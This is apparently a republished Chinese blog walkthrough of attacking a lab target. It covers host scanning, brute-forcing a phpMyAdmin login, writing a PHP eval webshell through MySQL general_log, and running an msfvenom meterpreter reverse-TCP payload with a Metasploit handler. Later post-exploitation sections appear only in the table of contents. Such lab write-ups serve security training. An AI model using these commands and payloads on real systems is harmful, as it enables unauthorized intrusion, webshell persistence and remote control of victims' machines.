admin管理员组文章数量:1637855
Web渗透测试对靶机注入shell
文章目录
- Web渗透测试对靶机注入shell
-
- 1、寻找目标信息
-
- netdiscover扫描
- nmap扫描
- 利用御剑后台进行扫描
- 2、对登录页面进行暴力破解
-
- 启动burp suite对目标网页进行拦截
- 对目标进行暴力破解
- 3、进入phpmyadmin界面
-
- 查看主页信息
- 对目标信息进行渗透处理
-
- 查看日志是否打开
- 创建日志文件getshell
- 4、用中国蚁剑进行连接
-
- 建立连接
- 用kali生成木马文件
-
- 注意
- 把生成的文件上传到服务器
- 用kali进行监听
-
- 用中国蚁剑运行程序
- 5、后渗透阶段
-
- 查看当前角色
- 提权
- 迁移进程
- 获取账号密码
- 加载 kiwi模块
-
- 用法:
- **远程桌面登录**
-
- 用户添加失败
- 去中国蚁剑进行添加
- 用MobaXterm进行远程连接
- **添加路由、挂Socks5代理**
- 连接代理
-
- 端口修改
- 把meterpreter 放在后台运行
-
- 返回meterpreter
- 内网主机信息收集
- 中国蚁剑终端使用命令
- 内网存活主机服务探测(合集)
- 6.内网横向渗透
-
- 哈希传递攻击
- 在meterpreter中运行
-
- 运行命令
- 中国蚁剑上运行
-
- 执行第二台机器上的命令
- 7.使用cobaltstike联动MSF
-
- 安装cobaltstike
-
- Cobaltstrike简介
- 开启cobaltstike服务
-
- kali上的操作
- 物理机上操作
- 开启监听
-
- 添加监听
- 查看添加
- kali里面的操作
- 返回cobaltstrike进行查看
- 建立会话交互
- 查看命令
- 抓取密码
-
- 得到密码
- 查看密码
- 横向移动:
-
- 新建监听器
- 横向移动目标机
-
- 查看网络拓扑图
- 横向移动第2个目标机
-
- 查看网络拓扑图
1、寻找目标信息
netdiscover扫描
打开kali,使用root权限,输入命令
netdiscover
目标主机为显示 VMare的IP地址得到目标主机IP地址为:192.168.0.4
nmap扫描
输入命令
nmap -sV -O -T4 192.168.0.4
发现目标主机有端口3306是打开的
利用御剑后台进行扫描
输入域名(就是目标IP地址):192.168.0.4
得到网页地址:phpMyAdmin
网页界面如下
2、对登录页面进行暴力破解
启动burp suite对目标网页进行拦截
对目标进行暴力破解
- 首先,单击【鼠标右键】–【发送给测试器】–点击【Intruder】
- 进入intruder界面后,点击【Positions】
- 然后点击【清除】把变量都清楚了
- 选中【admin】(username和password)后面的值,单击【添加】,把要进行暴力破解的变量进行添加
- 下拉攻击类型选中【Clusterbomb】
- 然后点击【Payload】
- 有效负载集为1载入Username.txt文件中的数据
- 有效负载集为2载入Password.txt文件中的数据
- 然后点击【开始攻击】:程序自动进行暴力破解
- 匹配用户名和密码
- 破解得到用户名为:root
- 密码为:root
3、进入phpmyadmin界面
查看主页信息
对目标信息进行渗透处理
查看日志是否打开
- 点击【变量】
- 查看是否开启日志和日志地址
创建日志文件getshell
进入SQL界面
#set global general_log=on; #开启日志
set global general_log_file = 'C:/phpstudy/www/xxb.php'; #设置指定文件为网址日志存放文件
select '<?php @eval($_POST["xxb"]);?>';
下面图片是先前截的图
再次进入【变量】
把general log_file的路径中的文件名换成刚才新建的文件名
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
4、用中国蚁剑进行连接
建立连接
注意后缀名和密码
点击测试连接–连接成功–保存这个状态
用kali生成木马文件
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -f exe -o /home/kali/shell.exe
注意
LHOST的IP地址
和/home/kali/shell.exe的路径和文件名
建议把文件名改成自己想的名字
把生成的文件上传到服务器
用kali进行监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.59.134
set lport 4444
run
用中国蚁剑运行程序
去kali看看
入侵成功
5、后渗透阶段
查看当前角色
getuid
本文标签: 靶机测试webShellphpmyadmin
版权声明:本文标题:Web渗透测试对靶机注入shell(phpMyAdmin) 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dongtai/1729260057a1192822.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论